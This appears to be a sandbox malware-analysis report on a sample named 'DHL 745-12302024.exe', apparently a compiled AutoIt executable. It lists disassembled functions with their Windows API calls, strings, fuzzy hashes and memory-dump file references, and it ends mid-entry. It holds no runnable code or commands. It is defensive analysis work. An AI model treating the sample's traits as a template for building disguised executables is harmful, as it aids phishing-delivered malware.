API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 5c13e41e0a894762620d3a42e478969ad93bb2ae8b4426689030f8be3de4346b
Instruction ID: 95ed30c78368bd571b8fdbb919f0c417ed57956837e902ab0f9ac76aa5a91e89
Opcode Fuzzy Hash: 5c13e41e0a894762620d3a42e478969ad93bb2ae8b4426689030f8be3de4346b
Instruction Fuzzy Hash: B6016975200209BFDB119FE6DD49E6A3B6EEF8A3A4B250518FA41C7360DB31DC11CA60

Function 00AC0FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AC0FCA
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AC0FD6
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AC0FE5
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AC0FEC
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AC1002

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: d6900002f1f10aa022af8d4bfb04bf8742b190ec12c652eb4696ab4c59083336
Instruction ID: b81a5012dbb4b5450be419eda14c2a965109c3b6b6c91b5c15800cfc9a97a8bf
Opcode Fuzzy Hash: d6900002f1f10aa022af8d4bfb04bf8742b190ec12c652eb4696ab4c59083336
Instruction Fuzzy Hash: 6EF06235200315EBD7218FE5DD4DF663B6DEF8A761F114415F946C7251CA70DC51CA60

Function 00AC1014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AC102A
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AC1036
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AC1045
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AC104C
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AC1062

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 5464b50729ddf426769f4ed7eca87cf1c5e447743a57dfd293f783a389285f97
Instruction ID: eebe28ce18cde3302949dd441623d6e863700599fe516b3e6f6a07430bbbb3bf
Opcode Fuzzy Hash: 5464b50729ddf426769f4ed7eca87cf1c5e447743a57dfd293f783a389285f97
Instruction Fuzzy Hash: 4DF0C239200305EBD7219FE5ED49F663B6DEF8A761F110424FD05C7251CA30D851CA60

Function 00AD030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00AD017D,?,00AD32FC,?,00000001,00AA2592,?), ref: 00AD0324
CloseHandle.KERNEL32(?,?,?,?,00AD017D,?,00AD32FC,?,00000001,00AA2592,?), ref: 00AD0331
CloseHandle.KERNEL32(?,?,?,?,00AD017D,?,00AD32FC,?,00000001,00AA2592,?), ref: 00AD033E
CloseHandle.KERNEL32(?,?,?,?,00AD017D,?,00AD32FC,?,00000001,00AA2592,?), ref: 00AD034B
CloseHandle.KERNEL32(?,?,?,?,00AD017D,?,00AD32FC,?,00000001,00AA2592,?), ref: 00AD0358
CloseHandle.KERNEL32(?,?,?,?,00AD017D,?,00AD32FC,?,00000001,00AA2592,?), ref: 00AD0365

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9d7e2c01a67006b1155d4d5c9f7258323b5659996ee0ffbcad5087e4ca6a4911
Instruction ID: 3cd04983996f90b6eaaa93f9c535fe9bcb7c951645d8ccbc0decac42f5d7a581
Opcode Fuzzy Hash: 9d7e2c01a67006b1155d4d5c9f7258323b5659996ee0ffbcad5087e4ca6a4911
Instruction Fuzzy Hash: FE01AE72800B559FCB30AF66D880916FBF9BF603153158A3FD1A796A31C3B1A959DF80

Function 00A9D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A9D752

Part of subcall function 00A929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9D7D1,00000000,00000000,00000000,00000000,?,00A9D7F8,00000000,00000007,00000000,?,00A9DBF5,00000000), ref: 00A929DE
Part of subcall function 00A929C8: GetLastError.KERNEL32(00000000,?,00A9D7D1,00000000,00000000,00000000,00000000,?,00A9D7F8,00000000,00000007,00000000,?,00A9DBF5,00000000,00000000), ref: 00A929F0

_free.LIBCMT ref: 00A9D764
_free.LIBCMT ref: 00A9D776
_free.LIBCMT ref: 00A9D788
_free.LIBCMT ref: 00A9D79A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a6d2dec98e7d470506ceaea5a8bb831fdff87f0b996ff16c6378e3ccced5abc5
Instruction ID: b644c16f4068f93bc9c4349621ff047954c9cf1f0da0898ecb6505b295af8b05
Opcode Fuzzy Hash: a6d2dec98e7d470506ceaea5a8bb831fdff87f0b996ff16c6378e3ccced5abc5
Instruction Fuzzy Hash: 32F0AF72745204AB8E25EBA4FAC5D1A7BDDBB447107A54805F04DEB551CB20FCC187A5

Function 00A922A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A922BE

Part of subcall function 00A929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00A9D7D1,00000000,00000000,00000000,00000000,?,00A9D7F8,00000000,00000007,00000000,?,00A9DBF5,00000000), ref: 00A929DE
Part of subcall function 00A929C8: GetLastError.KERNEL32(00000000,?,00A9D7D1,00000000,00000000,00000000,00000000,?,00A9D7F8,00000000,00000007,00000000,?,00A9DBF5,00000000,00000000), ref: 00A929F0

_free.LIBCMT ref: 00A922D0
_free.LIBCMT ref: 00A922E3
_free.LIBCMT ref: 00A922F4
_free.LIBCMT ref: 00A92305

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 1a75ab6a1223ea3725278ef40ee8e2170040a996317ca8328efafeb060d671cd
Instruction ID: 0515d4ad94971cb60b69c6940d45e67638fbd08b1b215aae8d886945df1e6fca
Opcode Fuzzy Hash: 1a75ab6a1223ea3725278ef40ee8e2170040a996317ca8328efafeb060d671cd
Instruction Fuzzy Hash: 9EF03AB1910520AB8A22FF5CBD01A5D3FE8BB687607200A4AF418D72B1CF300912EBE4

Function 00A795C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00A795D4
StrokeAndFillPath.GDI32(?,?,00AB71F7,00000000,?,?,?), ref: 00A795F0
SelectObject.GDI32(?,00000000), ref: 00A79603
DeleteObject.GDI32 ref: 00A79616
StrokePath.GDI32(?), ref: 00A79631

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 49f4688881cf8bdce3ea075cec425ac35356f379bde3e921a9856fc2fac67e6f
Instruction ID: 07c97207bdb47641f036f4f9e1b9061d0adfa98d38164b08bbc91fdeb8316621
Opcode Fuzzy Hash: 49f4688881cf8bdce3ea075cec425ac35356f379bde3e921a9856fc2fac67e6f
Instruction Fuzzy Hash: D9F0CD35005608EBD7169F99ED187693B69A701332F14C715F459560F0CF308557DF24

Function 00A90F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00A910F9
__freea.LIBCMT ref: 00A91117

Part of subcall function 00A91537: _free.LIBCMT ref: 00A9154F

Strings

a/p, xrefs: 00A911DE
am/pm, xrefs: 00A9117A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: b9b0c02c30df5f08b9b42c70c0aaf21e5538672db50db4cbb5f0e1b29da13130
Instruction ID: 4c6946969ffbf5b4d98fa8dca5b93fe87f6ed10c1e601c911777590031521011
Opcode Fuzzy Hash: b9b0c02c30df5f08b9b42c70c0aaf21e5538672db50db4cbb5f0e1b29da13130
Instruction Fuzzy Hash: 80D1CC35B00207DADF699F68C985AFBB7F0EF06300F284269E915AFA50D7759D80CB91

Function 00AE7B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00A80242: EnterCriticalSection.KERNEL32(00B3070C,00B31884,?,?,00A7198B,00B32518,?,?,?,00A612F9,00000000), ref: 00A8024D
Part of subcall function 00A80242: LeaveCriticalSection.KERNEL32(00B3070C,?,00A7198B,00B32518,?,?,?,00A612F9,00000000), ref: 00A8028A

Part of subcall function 00A69CB3: _wcslen.LIBCMT ref: 00A69CBD

Part of subcall function 00A800A3: __onexit.LIBCMT ref: 00A800A9

__Init_thread_footer.LIBCMT ref: 00AE7BFB

Part of subcall function 00A801F8: EnterCriticalSection.KERNEL32(00B3070C,?,?,00A78747,00B32514), ref: 00A80202
Part of subcall function 00A801F8: LeaveCriticalSection.KERNEL32(00B3070C,?,00A78747,00B32514), ref: 00A80235

Strings

Variable must be of type 'Object'., xrefs: 00AE7C3A
5, xrefs: 00AE7C78
G, xrefs: 00AE7C7F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 25c1f3a89f941ff9d3ca30045d2a432d598f76daf44c7ba8f5c6386635f943dc
Instruction ID: a2ed1113ae2b00afe2b40f50213038b3c4b7df31871be3e11004f726e4efebc7
Opcode Fuzzy Hash: 25c1f3a89f941ff9d3ca30045d2a432d598f76daf44c7ba8f5c6386635f943dc
Instruction Fuzzy Hash: 9891BD75A04249EFCB04EF96DA91DBDB7B5FF48300F248049F806AB292DB71AE45CB51

Function 00A9172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL 745-12302024.exe,00000104), ref: 00A91769
_free.LIBCMT ref: 00A91834
_free.LIBCMT ref: 00A9183E

Strings

C:\Users\user\Desktop\DHL 745-12302024.exe, xrefs: 00A91760, 00A91767, 00A91796, 00A917CE

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\DHL 745-12302024.exe
API String ID: 2506810119-3878462041
Opcode ID: 7ff7d7487a8275591a16054fdea08c6fb6772cbd156d4c8664231db507693ad8
Instruction ID: 6717a27a11265b17f1e8551b1bca8b2a7369c20dd6ac3db870ba532ea91523f7
Opcode Fuzzy Hash: 7ff7d7487a8275591a16054fdea08c6fb6772cbd156d4c8664231db507693ad8
Instruction Fuzzy Hash: 4A316D75B0021AAFDF21DB999D85D9EBBFCEB85310B2441A6F80497211DA708E40DBA0

Function 00ACC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00ACC306
DeleteMenu.USER32(?,00000007,00000000), ref: 00ACC34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B31990,012D75E0), ref: 00ACC395

Strings

0, xrefs: 00ACC2DF

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 1887b264e53f73bef0d7f75091731b28684bda9aaf73f40051a1431b480d775b
Instruction ID: eb2cb3c9cfa7ddc08cbadc1ca824fdf53929b1f321a349862f8cd3d3992d083c
Opcode Fuzzy Hash: 1887b264e53f73bef0d7f75091731b28684bda9aaf73f40051a1431b480d775b
Instruction Fuzzy Hash: E041A0712043419FD720DF25E945F6ABBE8AF85320F11861DF8A99B3D1D730A905CB62

Function 00AF4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00AFCC08,00000000,?,?,?,?), ref: 00AF44AA
GetWindowLongW.USER32 ref: 00AF44C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AF44D7

Strings

SysTreeView32, xrefs: 00AF447C

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 96d1780c82947dced16d1a322f68a83f88259d2ce66ba95f5485b8fb95ac01c8
Instruction ID: 0096764b15cb1cf440460d463e3f151c0368c6e3e375d523189dd741b4c2d449
Opcode Fuzzy Hash: 96d1780c82947dced16d1a322f68a83f88259d2ce66ba95f5485b8fb95ac01c8
Instruction Fuzzy Hash: E1318F31214609AFDB209FB8DC45BEB7BA9EB08334F208715FA79A21E0D770EC519B50

Function 00AE304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00AE3077,?,?), ref: 00AE3378

inet_addr.WSOCK32(?), ref: 00AE307A
_wcslen.LIBCMT ref: 00AE309B
htons.WSOCK32(00000000), ref: 00AE3106

Strings

255.255.255.255, xrefs: 00AE3095, 00AE309A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 1b02cc915d1874cd0ffcab546d7e642c662557b8d494f49f2441ecc02f6bc7fc
Instruction ID: b2db74ea22671b699661061f7dd33375516c13fa786bd8308463a65931eef237
Opcode Fuzzy Hash: 1b02cc915d1874cd0ffcab546d7e642c662557b8d494f49f2441ecc02f6bc7fc
Instruction Fuzzy Hash: 4031E4362042859FCF20CF6AC589EAA77F0EF54318F258199E9158B392DB32EF45C761

Function 00AF4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00AF4705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00AF4713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AF471A

Strings

msctls_updown32, xrefs: 00AF4684

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 67236fa9c433800e6e467969b80b4501ad8b3633a9a68e66ae89e0ab86e8d141
Instruction ID: 08efbd3bd61978c731461bef0bc8d48640a8de577049399a4ee7a722f9e9a36c
Opcode Fuzzy Hash: 67236fa9c433800e6e467969b80b4501ad8b3633a9a68e66ae89e0ab86e8d141
Instruction Fuzzy Hash: A22131B5604209AFEB10DFA8DC81DBB37ADEB5A364B140559F6009B251DB71EC12CA60

Function 00AC95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00AC961D

Strings

#notrayicon, xrefs: 00AC95B7
#requireadmin, xrefs: 00AC95D9
#OnAutoItStartRegister, xrefs: 00AC95F3

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: ce253b40d6d2b46baac04e6dc4ca477eb5db2de157463fc7de1eb938351a6ed8
Instruction ID: 358ae79a0b2029d225d4eb055ab630020856b3a2d3ec20168c0f0c6beb07ddc1
Opcode Fuzzy Hash: ce253b40d6d2b46baac04e6dc4ca477eb5db2de157463fc7de1eb938351a6ed8
Instruction Fuzzy Hash: AA21AA322042146AE731BB24DD0AFBB73E8AF94300F51442EFA4A9B081EF64EE45C3D5

Function 00AF37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00AF3840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00AF3850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00AF3876

Strings

Listbox, xrefs: 00AF380F

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 635da30580dd69b13c2cd2829fb7db6b83b651d3c2eca5f8340a646ed10c2479
Instruction ID: a37f5e3a18d661c775dd66ed5fa45ec2f90eb3fb7de42eeefc48153b3aeb7336
Opcode Fuzzy Hash: 635da30580dd69b13c2cd2829fb7db6b83b651d3c2eca5f8340a646ed10c2479
Instruction Fuzzy Hash: EE217F72610118BBEF11DF95DC45EBB376EEF897A0F118124FA059B190CA75DC5287A0

Function 00AC223F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AC2258

Part of subcall function 00A66B57: _wcslen.LIBCMT ref: 00A66B6A

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AC228A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AC22CA

Strings

@U=u, xrefs: 00AC2258, 00AC228A, 00AC22CA

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID: @U=u
API String ID: 763830540-2594219639
Opcode ID: 37d994b6a43c70ddc45ab12fb346f370d9a75a9642cbe7c7906a3c4db918d37a
Instruction ID: c445410851d46d7b6828a148931caf6e113aa036eea72da79b113858bcd669bd
